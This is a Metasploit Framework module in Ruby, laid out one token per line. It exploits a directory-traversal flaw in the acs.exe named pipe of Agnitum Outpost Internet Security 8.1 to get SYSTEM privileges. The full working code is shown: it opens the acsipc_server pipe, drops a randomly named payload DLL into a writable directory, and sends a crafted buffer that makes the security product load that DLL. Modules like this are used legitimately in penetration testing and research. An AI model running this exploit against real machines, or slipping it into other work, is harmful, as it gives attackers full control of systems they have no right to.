##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require
'msf/core'
require
'rex'
require
'msf/core/post/common'
require
'msf/core/post/windows/priv'
require
'msf/core/post/windows/process'
class
Metasploit3 < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Exploit::
EXE
include Msf::Post::Common
include Msf::Post::
File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Exploit::FileDropper
def
initialize(info={})
super
(update_info(info, {
'Name'
=>
'Agnitum Outpost Internet Security Local Privilege Escalation'
,
'Description'
=> %q{
This
module
exploits a directory traversal vulnerability on Agnitum Outpost Internet
Security
8
.
1
. The vulnerability exists
in
the acs.exe component, allowing the user to load
load arbitrary DLLs through the acsipc_server named pipe,
and
finally execute arbitrary
code with
SYSTEM
privileges. This
module
has been tested successfully on Windows
7
SP1
with
Agnitum Outpost Internet Security
8
.
1
(
32
bits
and
64
bits versions).
},
'License'
=>
MSF_LICENSE
,
'Author'
=>
[
'Ahmad Moghimi'
,
# Vulnerability discovery
'juan vazquez'
# MSF module
],
'Arch'
=>
ARCH_X86
,
'Platform'
=>
'win'
,
'SessionTypes'
=> [
'meterpreter'
],
'Privileged'
=>
true
,
'Targets'
=>
[
[
'Agnitum Outpost Internet Security 8.1'
, { } ],
],
'Payload'
=>
{
'Space'
=>
2048
,
'DisableNops'
=>
true
},
'References'
=>
[
[
'OSVDB'
,
'96208'
],
[
'EDB'
,
'27282'
],
[
'URL'
,
'http://mallocat.com/a-journey-to-antivirus-escalation/'
]
],
'DisclosureDate'
=>
'Aug 02 2013'
,
'DefaultTarget'
=>
0
}))
register_options([
# It is OptPath becuase it's a *remote* path
OptString.
new
(
"WritableDir"
, [
false
,
"A directory where we can write files (%TEMP% by default)"
]),
# By default acs.exe lives on C:\Program Files\Agnitum\Outpost Security Suite Pro\
OptInt.
new
(
"DEPTH"
, [
true
,
"Traversal depth"
,
3
])
],
self
.
class
)
end
def
junk
return
rand_text_alpha(
4
).unpack(
"V"
).first
end
def
open_named_pipe(pipe)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(pipe,
"GENERIC_READ | GENERIC_WRITE"
, 0x3,
nil
,
"OPEN_EXISTING"
,
"FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL"
,
0
)
handle = r[
'return'
]
if
handle == invalid_handle_value
return
nil
end
return
handle
end
def
write_named_pipe(handle, dll_path, dll_name)
traversal_path =
"..\\"
* datastore[
"DEPTH"
]
traversal_path << dll_path.gsub(/^[a-zA-
Z
]+:\\/,
""
)
traversal_path <<
"\\#{dll_name}"
path = Rex::Text.to_unicode(traversal_path)
data =
"\x00"
* 0x11
data << path
data <<
"\x00\x00"
data <<
"\x00\x00\x00"
buf = [0xd48a445e, 0x466e1597, 0x327416ba, 0x68ccde15].pack(
"V*"
)
# GUID common_handler
buf << [0x17].pack(
"V"
)
# command
buf << [junk].pack(
"V"
)
buf << [data.length].pack(
"V"
)
buf << [
0
,
0
,
0
].pack(
"V*"
)
buf << data
w = client.railgun.kernel32.WriteFile(handle, buf, buf.length,
4
,
nil
)
if
w[
'return'
] ==
false
print_error(
"The was an error writing to disk, check permissions"
)
return
nil
end
return
w[
'lpNumberOfBytesWritten'
]
end
def
check
handle = open_named_pipe(
"\\\\.\\pipe\\acsipc_server"
)
if
handle.
nil
?
return
Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
return
Exploit::CheckCode::Detected
end
def
exploit
temp_dir =
""
print_status(
"Opening named pipe..."
)
handle = open_named_pipe(
"\\\\.\\pipe\\acsipc_server"
)
if
handle.
nil
?
fail_with(Failure::NoTarget,
"\\\\.\\pipe\\acsipc_server named pipe not found"
)
else
print_good(
"\\\\.\\pipe\\acsipc_server found! Proceeding..."
)
end
if
datastore[
"WritableDir"
]
and
not
datastore[
"WritableDir"
].empty?
temp_dir = datastore[
"WritableDir"
]
else
temp_dir = expand_path(
"%TEMP%"
)
end
print_status(
"Using #{temp_dir} to drop malicious DLL..."
)
begin
cd(temp_dir)
rescue
Rex::Post::Meterpreter::RequestError
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Config,
"Failed to use the #{temp_dir} directory"
)
end
print_status(
"Writing malicious DLL to remote filesystem"
)
write_path = pwd
dll_name =
"#{rand_text_alpha(10 + rand(10))}.dll"
begin
# Agnitum Outpost Internet Security doesn't complain when dropping the dll to filesystem
write_file(dll_name, generate_payload_dll)
register_file_for_cleanup(
"#{write_path}\\#{dll_name}"
)
rescue
Rex::Post::Meterpreter::RequestError
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Config,
"Failed to drop payload into #{temp_dir}"
)
end
print_status(
"Exploiting through \\\\.\\pipe\\acsipc_server..."
)
bytes = write_named_pipe(handle, write_path, dll_name)
session.railgun.kernel32.CloseHandle(handle)
if
bytes.
nil
?
fail_with(Failure::Unknown,
"Failed while writing to \\\\.\\pipe\\acsipc_server"
)
end
end
end